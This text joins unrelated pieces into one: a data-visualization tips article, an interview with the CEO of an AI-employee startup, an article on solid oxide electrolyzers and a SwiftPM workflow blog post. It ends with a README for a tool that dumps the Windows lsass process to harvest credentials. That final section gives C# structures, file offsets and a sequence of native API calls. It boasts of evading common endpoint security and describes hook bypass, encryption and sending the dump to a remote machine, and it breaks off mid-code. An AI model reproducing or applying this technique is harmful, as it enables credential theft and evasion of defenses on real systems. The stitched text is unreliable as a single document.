
5 Tips for Effective Data Visualization


Image by Editor | Midjourney

 

Have you ever wondered how to transform data into clear and meaningful insights? Data visualizations do exactly that. They turn complex information into simple visuals that everyone can quickly grasp. This article will explore five tips to help you create powerful data visualizations.


 

1. Know Your Audience

 

Understanding your audience is key to effective data visualization. Adapt your visuals to meet their needs and expectations. Identify audiences by their backgrounds, roles, and interests. For instance, investors focus on financial metrics, while managers prioritize operational efficiencies. Adjust the level of detail based on your audience. Specialists may want deep data analysis, while decision-makers need clear summaries for strategic decisions. Consider your audience's preferred format. Some prefer interactive dashboards, others static infographics or detailed reports. For example, a marketing team might want interactive dashboards to track real-time campaign performance metrics, while a public relations team might find static infographics useful for visually presenting media coverage. Ensure that everyone can access the data. Consider factors such as language skills and visual impairments.

 

2. Choose the Right Visual

 

Different types of visuals have their strengths. It is important to select the right chart for each purpose.
Use a line graph to show trends over time. In the example provided, a line graph is used to plot the sales trends over the years.

 
Line chart
 

Opt for a bar chart when comparing categories among different groups. For example, a bar chart can compare the sales performance across five different product categories.

 
Bar chart
 

Avoid pie charts for clear data representation. They are hard to read and compare accurately. Small differences between slices are difficult to distinguish, and if there are too many categories, the pie chart becomes cluttered. The pie chart below visualizes the proportions of sales in different categories. There are many categories and small differences between the sales of each category, so the pie chart is difficult to interpret.

 
Pie chart
 

3. Avoid Misleading Visualizations

 

Misleading visualizations can distort the truth and lead to misinterpretation of data. Use accurate scales on graphs to represent data truthfully. Avoid truncated axes or inconsistent scales that distort differences between data points. Label all elements in your visualization: axes, data points, and categories. Ambiguous or missing labels can confuse viewers. Use consistent units across all data points and axes to prevent confusion. Three-dimensional effects can distort the perception of data, so use 2D representations unless the third dimension adds meaningful information. Be careful with shapes (like circles or squares) representing quantities; ensure their size or area matches the numerical values they depict. Verify data accuracy before creating visuals. Errors in data collection or processing can lead to misleading representations.

 

4. Keep It Simple

 

When creating data visualizations, simplicity is key to improving clarity and effectiveness. Clear and simple visuals help viewers grasp information quickly and accurately, without unnecessary distractions or confusion. Use concise labels that clearly describe each element in your visualization. Avoid technical jargon that could confuse non-experts. Choose fonts that are easy to read, and ensure the text is large enough for comfortable reading on screens or in print. Focus on the essential elements that convey your message. Use whitespace strategically to maintain visual balance and avoid overcrowding. Ensure consistent use of color schemes that enhance rather than distract from the data.

 

5. Tell a Story

 

Storytelling begins by framing the narrative around the data itself. Identify the specific issue your data analysis aims to address. Use charts or graphs to illustrate patterns across variables. Interpret the findings to uncover meaningful insights. Summarize the most important findings from your analysis.

Imagine a retail chain analyzing customer purchasing behavior across its stores. It wants to know which products are most popular and why customers prefer certain items. Charts and graphs show sales data for various product categories across multiple locations. They reveal trends in customer preferences and buying patterns over the past year. The findings indicate best-selling products and regional differences in customer preferences.

 

Wrapping Up

 
In conclusion, use these tips to create clear and impactful data visualizations. Apply them now to improve understanding and make better decisions with your data.
 
 

Jayita Gulati is a machine learning enthusiast and technical writer driven by her passion for building machine learning models. She holds a Master's degree in Computer Science from the University of Liverpool.

Surojit Chatterjee, Founder and CEO at Ema – Interview Series



Surojit Chatterjee is the founder and CEO of Ema. Previously, he guided Coinbase through a successful 2021 IPO as its Chief Product Officer and scaled Google Mobile Ads and Google Shopping into multi-billion dollar businesses as VP and Head of Product. Surojit holds 40 US patents and has an MBA from MIT, an MS in Computer Science from SUNY at Buffalo, and a B.Tech from IIT Kharagpur.

Ema is a universal AI employee, seamlessly integrated into your organization's existing IT infrastructure. She's designed to boost productivity, streamline processes, and empower your teams.

Can you elaborate on the vision behind Ema and what inspired you to create a universal AI employee?

The goal for Ema is clear and bold: "transform enterprises by building a universal AI employee." This vision stems from our belief that AI can augment human capabilities rather than replace employees entirely. Our Universal AI Employee is designed to automate mundane, repetitive tasks, freeing up human employees to focus on more strategic and valuable work. We do this through Ema's innovative agentic AI system, which can perform a wide range of complex tasks with a set of AI agents (called Ema's Personas), improving efficiency and boosting productivity across diverse organizations.

Both you and your co-founder have impressive backgrounds at major tech companies. How has your past experience influenced the development and strategy of Ema?

Over the last two decades, I've worked at iconic companies like Google, Coinbase, Oracle, and Flipkart. And at every place, I wondered, "Why do we hire the smartest people and give them jobs that are so mundane?" That is why we're building Ema.

Prior to co-founding Ema, I was the chief product officer of Coinbase and Flipkart and the global head of product for mobile ads at Google. These experiences deepened my technical knowledge across engineering, machine learning, and adtech. These roles allowed me to identify inefficiencies in the ways we work and ways to solve complex business problems.

Ema's co-founder and head of engineering, Souvik Sen, was previously the VP of engineering at Okta, where he oversaw data, machine learning, and devices. Before that, he was at Google, where he was the engineering lead for data and machine learning and built one of the world's largest ML systems focused on privacy and safety – Google's Trust Graph. His expertise, in particular, is a driving force behind why Ema's agentic AI system is highly accurate and built to be enterprise-ready in terms of security and privacy.

My cofounder Souvik and I thought: what if you had a Michelin Star chef in-house who could cook anything you asked for? You might be in the mood for French today, Italian tomorrow, and Indian the day after. But whatever your mood or the cuisine you want, that chef can recreate the dish of your dreams. That's what Ema can do. It can take on whatever role you need in the enterprise with just a simple conversation.

Ema uses over 100 large language models and its own smaller models. How do you ensure seamless integration and optimal performance from these varied sources?

LLMs, while powerful, fall short in enterprise settings because of their lack of specialized knowledge and context-specific training. These models are built on general knowledge, leaving them ill-equipped to handle the nuanced, proprietary information that drives enterprise operations. This limitation can lead to inaccurate outputs, potential data security risks, and an inability to provide the domain-specific insights crucial for informed decision-making. Agentic AI systems like Ema address these shortcomings by offering a more tailored and dynamic approach. Unlike static LLMs, our agentic AI systems can:

  • Adapt to enterprise-specific data and workflows
  • Leverage multiple LLMs based on accuracy, cost, and performance requirements
  • Maintain data privacy and security by operating within company infrastructure
  • Provide explainable and verifiable outputs, crucial for enterprise accountability
  • Continuously update and learn from real-time enterprise data
  • Execute complex, multi-step tasks autonomously

We ensure seamless integration from these varied sources by using Ema's proprietary 2T+ parameter mixture-of-experts model: EmaFusion™. EmaFusion™ combines 100+ public LLMs and many domain-specific custom models to maximize accuracy at the lowest possible cost for a wide variety of enterprise tasks, maximizing the return on investment. Plus, with this novel approach, Ema is future-proof; we are constantly adding new models to prevent overreliance on any one technology stack, taking this risk away from our enterprise customers.

Can you explain how the Generative Workflow Engine works and what advantages it offers over traditional workflow automation tools?

We've developed tens of template Personas (or AI employees for specific roles). The Personas can be configured and deployed quickly by business users – no coding knowledge required. At its core, Ema's Personas are collections of proprietary AI agents that collaborate to perform complex workflows.

Our patent-pending Generative Workflow Engine™, a small transformer model, generates workflows and orchestration code, selecting the appropriate agents and design patterns. Ema leverages well-known agentic design patterns, such as reflection, planning, tool use, multi-agent collaboration, language agent tree search (LATS), and structured output, and introduces many innovative patterns of its own. With over 200 pre-built connectors, Ema seamlessly integrates with internal data sources and can take actions across tools to perform effectively in various enterprise roles.

Ema is used in various domains, from customer service to legal to insurance. In which industries do you see the greatest potential for growth with Ema, and why?

We see potential across industries and functions, as most enterprises have less than 30% automation in their processes and use more than 200 software applications, leading to data and action silos. McKinsey & Co. estimates that generative AI could add the equivalent of $2.6 trillion to $4.4 trillion annually in productivity gains (source).

These issues are exacerbated in regulated industries like healthcare, financial services, and insurance, where much of the technical automation of the last decades has not happened because the technology was not advanced enough for their processes. That is where we see the biggest opportunity for transformation, and we are seeing a lot of demand from customers in these industries to leverage generative AI and technology like never before.

How does Ema address data safety and security concerns, especially when integrating multiple models and handling sensitive enterprise data?

A pressing concern for any company using agentic AI is the potential for AI agents to go rogue or leak private data. Ema is built with trust at its core, compliant with leading international standards such as SOC 2, ISO 27001, HIPAA, GDPR, NIST AI RMF, NIST CSF, and NIST 800-171. To ensure enterprise data stays private, secure, and compliant, Ema has implemented the following security measures:

  • Automatic redaction and protected de-identification of sensitive data, with audit logs
  • Real-time monitoring
  • Encryption of all data at rest and in transit
  • Explainability across all output results

To go the extra mile, Ema also checks for any copyright violations in document generation use cases, reducing customers' likelihood of IP liabilities. Ema also never trains models on one customer's data to benefit other customers.

Ema also offers flexible deployment options, including on-premises deployment capabilities for multiple cloud systems, enabling enterprises to keep their data within their own trusted environments.

How easy is it for a new company to get started with Ema, and what does the typical onboarding process look like?

Ema is extremely intuitive, so getting teams started on the platform is quite easy. Business users can set up Ema's Persona(s) using pre-built templates in just minutes. They can fine-tune Persona behavior with conversational instructions, use pre-built connectors to integrate with their apps and data sources, and optionally plug in any private custom models trained on their own data. Once set up, experts from the enterprise can train their Ema Persona with just a few hours of feedback. Ema has been hired for several roles by enterprises such as Envoy Global, TrueLayer, and Moneyview, and in each of these roles Ema is already performing at or above human performance.

Ema has attracted significant funding from high-profile backers. What do you believe has been the key to gaining such strong investor confidence?

We believe investors can see how Ema's platform enables enterprises to use agentic AI effectively, streamlining operations for substantial cost reductions and unlocking potential new revenue streams. Additionally, Ema's management team are experts in AI and have the necessary technical knowledge and skill sets. We also have a strong track record of enterprise-grade delivery, reliability, and compliance. Finally, Ema's products are differentiated from everything else on the market; Ema is pioneering the latest technical advances in agentic AI, making us the go-to choice for any enterprise looking to add next-generation AI to their operations.

How do you see the role of AI in the workplace evolving over the next decade, and what role will Ema play in that transformation?

Ema's mission is to transform enterprises and help every employee work faster with the help of simple-to-activate and accurate agents. Our universal AI employee has the potential to help enterprises execute tasks across customer support, employee assistance, sales enablement, compliance, revenue operations, and more. We'd like to transform the workplace by allowing teams to focus on the most strategic and highest-value projects instead of mundane, administrative tasks. As a pioneer of agentic AI, Ema is leading a new era of collaboration between human and AI employees, where innovation thrives and productivity skyrockets.

Thank you for the great interview; readers who wish to learn more should visit Ema.

High Efficiency, High Costs: Is There Room for Solid Oxide Electrolyzers in the Hydrogen Industry?


Solid oxide electrolyzers (SOECs) are emerging as a hot topic in the world of energy. They use a solid ceramic material to split water into hydrogen and oxygen at extremely high temperatures (600°C to 850°C). Because of the high operating temperature, they are also highly efficient, hitting energy efficiency levels between 80-100%. These levels are significantly higher than those of the other dominant electrolyzers on the market, such as Alkaline (AEL), Proton Exchange Membrane (PEM), and Anion Exchange Membrane (AEM), which usually have efficiency levels of 58-75%.

However, while SOEC efficiency is unparalleled, the high costs and technical challenges associated with SOECs make them suitable only for specific, high-value use cases.

Note: LHV 33.3 refers to the lower heating value of hydrogen (33.3 kWh/kg), used to calculate SOEC efficiency by measuring the energy content of the hydrogen produced. It represents the usable energy without accounting for water vaporization.

The Promise of SOECs  

SOECs are distinguished by their high efficiency, often achieving Higher Heating Value (HHV) efficiency above 100%. This means the energy output of the process can exceed the electrical energy input (part of the required energy is supplied as heat), a rare and valuable trait in energy production technologies. This high efficiency results in the production of high-purity hydrogen, which is crucial for industries that require stringent quality standards, such as the synthetic fuels sector.

Moreover, SOECs can use waste heat and steam from industrial processes, making them even more efficient and cheaper to run. This is a win for both cost savings and sustainability across various industries.

Where SOECs Really Shine

  • Synthetic Fuels: SOECs are particularly suitable for producing syngas (a mixture of hydrogen and carbon monoxide) for synthetic fuels. The high purity of the hydrogen means less refining is needed, making the whole process cheaper and more efficient. This is promising for the Sustainable Aviation Fuel (SAF) industry, which also has growing regulatory and production support. Offtake agreements such as Norsk e-fuels with Sunfire, and Airbus with Genvia, are already in place.
     
  • Steelmaking: The steel industry can cut CO2 emissions by 80-90% using SOECs, as hydrogen can replace carbon in the iron ore reduction process. The high-temperature environment and the availability of waste heat in steel plants align well with the operational needs of SOECs, further increasing efficiency. Projects like GrinHy with Sunfire and Salzgitter, and Ceres' SteelCell development with Doosan, are key in demonstrating the viability of this use case.
     
  • Nuclear Power Plants: SOECs can be integrated into nuclear plants to produce hydrogen more efficiently using the excess heat from the plants. This not only boosts plant efficiency but also enhances safety by reducing the need for external hydrogen supplies. The integration of hydrogen production within nuclear plants could also help balance the energy grid, providing a flexible and reliable energy source. Companies like FuelCell Energy and Bloom Energy are exploring this potential.
     

Corporate engagement through pilot demonstration plants and offtake agreements is crucial for scaling up production from kilowatts (kW) to megawatts (MW). Such initiatives are already underway, indicating growing interest and investment in this technology.

The Roadblocks 

Despite their benefits, the promise of SOECs comes at a high price: two to three times more expensive than other electrolyzers. They also face technical challenges because of their high operating temperatures, which can lead to faster wear and tear and higher upfront costs. While high operating temperatures help mitigate performance loss, they also induce thermal stress, increasing the risk of stack failure through electrolyte cracking or seal breakage. SOECs can run at full load for about 2.5 years, while other electrolyzers can last 4-8 times longer.

Additionally, SOEC technology depends heavily on electricity costs because it needs a lot of energy to run the high-temperature electrolysis process. It is much more cost-effective in places where electricity is cheap or there is plenty of affordable renewable energy. Conversely, it struggles in areas with high electricity costs, unstable power, or small-scale setups. SOECs need steady high temperatures and stable power to work well, so regions with unreliable renewable energy sources like solar or wind can have issues unless they use energy storage solutions or smart grid management to smooth out the power supply.

Scaling production from kW to MW would drastically reduce manufacturing and material costs; savings in total stack cost can be 67% to 77% when comparing kW-scale to MW-scale technologies. However, only a few innovators such as Bloom Energy and Topsoe have stacks at large scale, which is essential to demonstrate technical maturity and long-term viability to investors.

   

Innovating for the Future 

Looking ahead, the focus for SOEC technology is on technical innovation and cost reduction. 'Next-generation' SOEC technology aims to address the current limitations by improving the durability of materials, optimizing design, and enhancing manufacturing processes. Some examples are:

Manufacturing Innovation: 

  • Mitsubishi Heavy Industries: Uses tubes instead of sheets for stack manufacturing – simplifies gas sealing and flow management, leading to improved performance reliability
  • FuelCell Energy: Uses disc-shaped stacks to cut costs by repurposing DVD manufacturing equipment; stacks are 95% recyclable
  • Elcogen: Automating stack assembly to speed up manufacturing and lower costs

Material and Design Innovation:

  • Ceres: Uses a gadolinium-doped ceria electrolyte, which allows for lower-temperature operation, and the stack uses less nickel – improves durability and reduces costs
  • Elcogen: Operates at a lower temperature, allowing the use of cheaper components such as stainless steel instead of specialized alloys
  • Bloom Energy: Cutting out deoxygenation units to simplify system design – reduces costs and maintenance needs

Integration Innovation: 

  • Topsoe: Integration of electrolyzer technology with ammonia and methanol production, leveraging expertise from their catalyst business
  • Sunfire: Plants running on a combination of alkaline and SOEC electrolyzers, providing a strong advantage for the power-to-liquid and e-fuels markets

These developments are paving the way for SOECs to scale up and become more affordable. As the energy landscape shifts, SOECs could play a vital role in a sustainable and efficient hydrogen economy. However, realizing this potential will depend on continued innovation and corporate partnerships.

A different way to develop SwiftPM packages inside Xcode projects — Erica Sadun


WWDC gave us many reasons both to migrate libraries to SwiftPM and to develop new ones to support our work. The integration between Xcode development and SwiftPM dependencies keeps growing stronger and more essential.

Apple's Editing a Package Dependency as a Local Package assumes you'll drag your package into an Xcode project as a local package, which overrides one imported via a standard package dependency.

In Developing a Swift Package in Tandem with an App, Apple writes, "To develop a Swift package in tandem with an app, you can leverage the behavior whereby a local package overrides a package dependency with the same name…when you publish a new version of your Swift package or want to stop using the local package, remove it from the project to use the package dependency again."

I don't use this approach. It's not bad or wrong, it just doesn't fit my style.

However, opening the Package.swift file directly to develop has drawbacks, in that it doesn't yet fully offer Xcode's suite of IDE support features.

So I've been working on a personal solution that works best for me. I want my package development and its tests to live separately from any specific client app outside a testbed. I want to make sure that my code will swift build and swift test properly, but I also want to use Xcode's built-in compilation and unit testing with my happy green checks.

I set out to figure out how best, at least for me, to develop Swift packages under the xcodeproj umbrella.

I first explored swift package generate-xcodeproj. This builds an Xcode library project complete with tests and a package target. You can use the --type flag to set the package to executable, system-module, or manifest instead of the default (library) during swift package init:

Generate% swift package init
Creating library package: Generate
Creating Package.swift
Creating README.md
Creating .gitignore
Creating Sources/
Creating Sources/Generate/Generate.swift
Creating Tests/
Creating Tests/LinuxMain.swift
Creating Tests/GenerateTests/
Creating Tests/GenerateTests/GenerateTests.swift
Creating Tests/GenerateTests/XCTestManifests.swift
Generate% swift package generate-xcodeproj
generated: ./Generate.xcodeproj

Although SwiftPM creates a .gitignore file for you, as you can see, it doesn't initialize a git repository. Also, I always end up deleting the .gitignore, as I use a customized global ignore file. This is what the resulting project looks like:

As you see, the generated Xcode project has everything but a testbed for you. I really like having an on-hand testbed, whether a simple SwiftUI app or a command-line utility to play with ideas. I looked into using a playground but let's face it: too slow, too glitchy, too unreliable.

It's a pain to add a testbed to this setup, so I came up with a different way to build my base package environment. It's hacky, but I much prefer the result. Instead of generating the project, I start with a testbed project and then create my package. This approach naturally packs a sample with the package, but none of that sample leaks into the package itself:

I end up with three targets: the sample app, a library built from my Sources, and my tests. The library folder you see here contains only an Info.plist and a bridging header. It otherwise builds from whatever Sources I've added.

I much prefer this setup to the generate-xcodeproj approach, although it takes slightly longer to set up. The reason for this is that SwiftPM and Xcode use different philosophies for how a project folder is structured. SwiftPM has its Sources and Tests. Xcode uses a source folder named after the project.

So I remove that folder, add a Sources group to the project, and make sure that my build phases see and compile those files. The Tests need similar tweaks, plus I have to add a symbolic link from Xcode's tests name (e.g. "ProjectNameTests") to my SwiftPM Tests folder at the top level of my project to get it all to hang together. Once I've done so, my green checks are ready and waiting just as if I had opened the Package.swift file directly. But this time, I have all the right tools at hand.

Since I'm talking about setup, let me add that my tasks also include setting up the README, adding a license, and creating the initial change log. These are SwiftPM setup tasks that swift package init doesn't cover the way I like. I trash .gitignore, but since I have Xcode set up to automatically initialize version control, I don't have to git init by hand.

I think this is a short-term workaround, as I expect the integration of SwiftPM and Xcode to continue growing over the next couple of years. Since WWDC, I've been particularly excited about creating, deploying, and integrating SwiftPM packages. I thought I'd share this in case it might help others. Let me know.

Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)






NativeDump allows dumping the lsass process using only NTAPIs, generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List streams).

  • NtOpenProcessToken and NtAdjustPrivilegesToken to get the "SeDebugPrivilege" privilege
  • RtlGetVersion to get the operating system version details (major version, minor version and build number). This is necessary for the SystemInfo stream
  • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList stream
  • NtOpenProcess to get a handle to the lsass process
  • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time, this populates the Memory64List stream

Usage:

NativeDump.exe [DUMP_FILE]

The default file name is "proc_.dmp":


The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike…) and is so far undetected. However, it does not work if PPL is enabled on the system.

Some benefits of this technique are:

  • It does not use the well-known dbghelp!MinidumpWriteDump function
  • It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library
  • The Minidump file does not need to be written to disk; you can transfer its bytes (encoded or encrypted) to a remote machine

The project has three branches at the moment (apart from the main branch with the basic technique):

  • ntdlloverwrite – Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

  • delegates – Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

  • remote – Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding

Technique in detail: Creating a minimal Minidump file

After studying the undocumented Minidump structures, its layout can be summed up as:

  • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
  • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
  • Streams: Each stream contains different information related to the process and has its own format
  • Regions: The actual bytes of the process from each memory region that can be read

I created a parsing tool which can be helpful: MinidumpParser.

We will focus on creating a valid file with only the necessary values for the header, the Stream Directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: the SystemInfo, ModuleList and Memory64List streams.


A. Header

The header is a 32-byte structure which can be defined in C# as:

public struct MinidumpHeader
{
    public uint Signature;
    public ushort Version;
    public ushort ImplementationVersion;
    public ushort NumberOfStreams;
    public uint StreamDirectoryRva;
    public uint CheckSum;
    public IntPtr TimeDateStamp;
}

The required values are:

  • Signature: Fixed value 0x504D444D (the "MDMP" string)
  • Version: Fixed value 0xA793 (the Microsoft constant MINIDUMP_VERSION)
  • NumberOfStreams: Fixed value 3, the three streams required for the file
  • StreamDirectoryRva: Fixed value 0x20 (32 bytes), the size of the header
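As a minimal sketch (not NativeDump's actual code), the header can be filled with these fixed values and serialized through the struct's in-memory layout, using the MinidumpHeader struct above; the StructToBytes helper and the "proc.dmp" output name are illustrative:

using System;
using System.IO;
using System.Runtime.InteropServices;

// Sketch only: populate the 32-byte header with the fixed values listed above
// and serialize it by copying the struct's in-memory (sequential) layout.
static byte[] StructToBytes<T>(T value) where T : struct
{
    int size = Marshal.SizeOf<T>();
    byte[] bytes = new byte[size];
    IntPtr buffer = Marshal.AllocHGlobal(size);
    try
    {
        Marshal.StructureToPtr(value, buffer, false);
        Marshal.Copy(buffer, bytes, 0, size);
    }
    finally
    {
        Marshal.FreeHGlobal(buffer);
    }
    return bytes;
}

var header = new MinidumpHeader
{
    Signature = 0x504D444D,    // "MDMP"
    Version = 0xA793,          // MINIDUMP_VERSION
    NumberOfStreams = 3,       // SystemInfo, ModuleList and Memory64List
    StreamDirectoryRva = 0x20  // the Stream Directory follows the 32-byte header
};

File.WriteAllBytes("proc.dmp", StructToBytes(header)); // 32 bytes in a 64-bit process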


B. Stream Directory

Each entry in the Stream Directory is a 12-byte structure, so with 3 entries the size is 36 bytes. The C# struct definition for an entry is:

public struct MinidumpStreamDirectoryEntry
{
    public uint StreamType;
    public uint Size;
    public uint Location;
}

The field "StreamType" represents the type of stream as an integer or ID; some of the most relevant are:

ID   Stream Type
0x00 UnusedStream
0x01 ReservedStream0
0x02 ReservedStream1
0x03 ThreadListStream
0x04 ModuleListStream
0x05 MemoryListStream
0x06 ExceptionStream
0x07 SystemInfoStream
0x08 ThreadExListStream
0x09 Memory64ListStream
0x0A CommentStreamA
0x0B CommentStreamW
0x0C HandleDataStream
0x0D FunctionTableStream
0x0E UnloadedModuleListStream
0x0F MiscInfoStream
0x10 MemoryInfoListStream
0x11 ThreadInfoListStream
0x12 HandleOperationListStream
0x13 TokenStream
0x16 ProcessVmCountersStream
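For this minimal dump only three of those types are used. Using the sizes and file offsets worked out in the following sections (the Memory64List size is only known once the regions have been counted), a sketch of the Stream Directory built from the MinidumpStreamDirectoryEntry struct above could look like this:

var streamDirectory = new[]
{
    // SystemInfoStream (0x07): 56 bytes at offset 0x44, right after the directory
    new MinidumpStreamDirectoryEntry { StreamType = 0x07, Size = 56,  Location = 0x44 },
    // ModuleListStream (0x04): 112 bytes at offset 0x7C
    new MinidumpStreamDirectoryEntry { StreamType = 0x04, Size = 112, Location = 0x7C },
    // Memory64ListStream (0x09): at offset 0x12A, size filled in after walking memory
    new MinidumpStreamDirectoryEntry { StreamType = 0x09, Size = 0,   Location = 0x12A },
};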

C. SystemInformation Stream

The first stream is a SystemInformation stream, with ID 7. Its size is 56 bytes and it will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

public struct SystemInformationStream
{
    public ushort ProcessorArchitecture;
    public ushort ProcessorLevel;
    public ushort ProcessorRevision;
    public byte NumberOfProcessors;
    public byte ProductType;
    public uint MajorVersion;
    public uint MinorVersion;
    public uint BuildNumber;
    public uint PlatformId;
    public uint UnknownField1;
    public uint UnknownField2;
    public IntPtr ProcessorFeatures;
    public IntPtr ProcessorFeatures2;
    public uint UnknownField3;
    public ushort UnknownField14;
    public byte UnknownField15;
}

The required values are:

  • ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems
  • MajorVersion, MinorVersion and BuildNumber: Hardcoded or obtained via kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)
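A small P/Invoke sketch of the ntdll!RtlGetVersion call that supplies those three version fields; the declarations here are assumptions for illustration, not necessarily the project's exact signatures:

using System;
using System.Runtime.InteropServices;

class OsVersionExample
{
    // Layout compatible with RTL_OSVERSIONINFOW, which ntdll!RtlGetVersion expects.
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct OSVERSIONINFOW
    {
        public uint dwOSVersionInfoSize;
        public uint dwMajorVersion;
        public uint dwMinorVersion;
        public uint dwBuildNumber;
        public uint dwPlatformId;
        [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
        public string szCSDVersion;
    }

    [DllImport("ntdll.dll")]
    static extern int RtlGetVersion(ref OSVERSIONINFOW versionInfo);

    static void Main()
    {
        var info = new OSVERSIONINFOW { dwOSVersionInfoSize = (uint)Marshal.SizeOf<OSVERSIONINFOW>() };
        RtlGetVersion(ref info);
        // These three values go into MajorVersion, MinorVersion and BuildNumber above;
        // ProcessorArchitecture is set to 9 (x64) on 64-bit systems.
        Console.WriteLine($"Windows {info.dwMajorVersion}.{info.dwMinorVersion} build {info.dwBuildNumber}");
    }
}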


D. ModuleList Stream

The second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C), after the SystemInformation stream, and it will also have a fixed size of 112 bytes, since it will contain the entry of a single module, the only one needed for the parsing to be correct: "lsasrv.dll".

The usual structure for this stream is a 4-byte value containing the number of entries, followed by a 108-byte entry for each module:

public struct ModuleListStream
{
    public uint NumberOfModules;
    public ModuleInfo[] Modules;
}

As there is only one module, it gets simplified to:

public struct ModuleListStream
{
    public uint NumberOfModules;
    public IntPtr BaseAddress;
    public uint Size;
    public uint UnknownField1;
    public uint Timestamp;
    public uint PointerName;
    public IntPtr UnknownField2;
    public IntPtr UnknownField3;
    public IntPtr UnknownField4;
    public IntPtr UnknownField5;
    public IntPtr UnknownField6;
    public IntPtr UnknownField7;
    public IntPtr UnknownField8;
    public IntPtr UnknownField9;
    public IntPtr UnknownField10;
    public IntPtr UnknownField11;
}

The required values are:

  • NumberOfModules: Fixed value 1
  • BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter)
  • Size: Obtained by adding up all the memory region sizes starting at BaseAddress until reaching one with a size of 4096 bytes (0x1000), the .text section of another library
  • PointerName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)
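As an illustration (the BuildModuleList helper and its lsasrvBase/lsasrvSize arguments are hypothetical, with the values assumed to come from the memory walk in section F), the single-module stream could be filled like this:

// Sketch: build the single-module ModuleList stream from the values listed above.
static ModuleListStream BuildModuleList(IntPtr lsasrvBase, uint lsasrvSize)
{
    return new ModuleListStream
    {
        NumberOfModules = 1,
        BaseAddress = lsasrvBase, // found via NtQueryInformationProcess + NtReadVirtualMemory
        Size = lsasrvSize,        // region sizes summed until a 0x1000-byte region is reached
        PointerName = 0xEC        // file offset of the "C:\Windows\System32\lsasrv.dll" string
    };
}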


E. Memory64List Stream

The third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of memory regions.

public struct Memory64ListStream
{
    public ulong NumberOfEntries;
    public uint MemoryRegionsBaseAddress;
    public Memory64Info[] MemoryInfoEntries;
}

Each memory region entry is a 16-byte structure:

public struct Memory64Info
{
    public IntPtr Address;
    public IntPtr Size;
}

The required values are:

  • NumberOfEntries: Number of memory regions, obtained after looping through the memory regions
  • MemoryRegionsBaseAddress: Location of the start of the memory region bytes, calculated by adding up the sizes of all the 16-byte memory entries
  • Address and Size: Obtained for each valid region while looping through them


F. Looping memory regions

There are prerequisites to loop through the memory regions of the lsass.exe process, which can be solved using only NTAPIs:

  1. Obtain the "SeDebugPrivilege" permission. Instead of the usual Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivileges, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant across all recent Windows versions)
  2. Obtain the process ID. For example, loop through all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
  3. Open a process handle. Use ntdll!NtOpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

With this it is possible to traverse the process memory by calling:

  • ntdll!NtQueryVirtualMemory: Returns a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region
  • If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populate one entry of the Memory64List stream and the bytes can be added to the file
  • If the base address equals the lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory
  • ntdll!NtReadVirtualMemory: Adds the bytes of that region to the Minidump file after the Memory64List stream
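A simplified C# sketch of that loop, with assumed P/Invoke declarations rather than the project's exact code:

using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;

// Sketch: walk the target process with NtQueryVirtualMemory and read every committed,
// accessible region with NtReadVirtualMemory, collecting one Memory64List entry per region.
class MemoryWalker
{
    [StructLayout(LayoutKind.Sequential)]
    struct MEMORY_BASIC_INFORMATION
    {
        public IntPtr BaseAddress;
        public IntPtr AllocationBase;
        public uint AllocationProtect;
        public IntPtr RegionSize;
        public uint State;
        public uint Protect;
        public uint Type;
    }

    [DllImport("ntdll.dll")]
    static extern uint NtQueryVirtualMemory(IntPtr hProcess, IntPtr baseAddress, int infoClass,
        ref MEMORY_BASIC_INFORMATION info, IntPtr infoLength, out IntPtr returnLength);

    [DllImport("ntdll.dll")]
    static extern uint NtReadVirtualMemory(IntPtr hProcess, IntPtr baseAddress, byte[] buffer,
        IntPtr bytesToRead, out IntPtr bytesRead);

    const uint PAGE_NOACCESS = 0x01;
    const uint MEM_COMMIT = 0x1000;

    static List<(IntPtr Address, IntPtr Size, byte[] Bytes)> DumpRegions(IntPtr hProcess)
    {
        var regions = new List<(IntPtr Address, IntPtr Size, byte[] Bytes)>();
        IntPtr address = IntPtr.Zero;
        var mbi = new MEMORY_BASIC_INFORMATION();

        // 0 = MemoryBasicInformation; a non-zero NTSTATUS ends the walk.
        while (NtQueryVirtualMemory(hProcess, address, 0, ref mbi,
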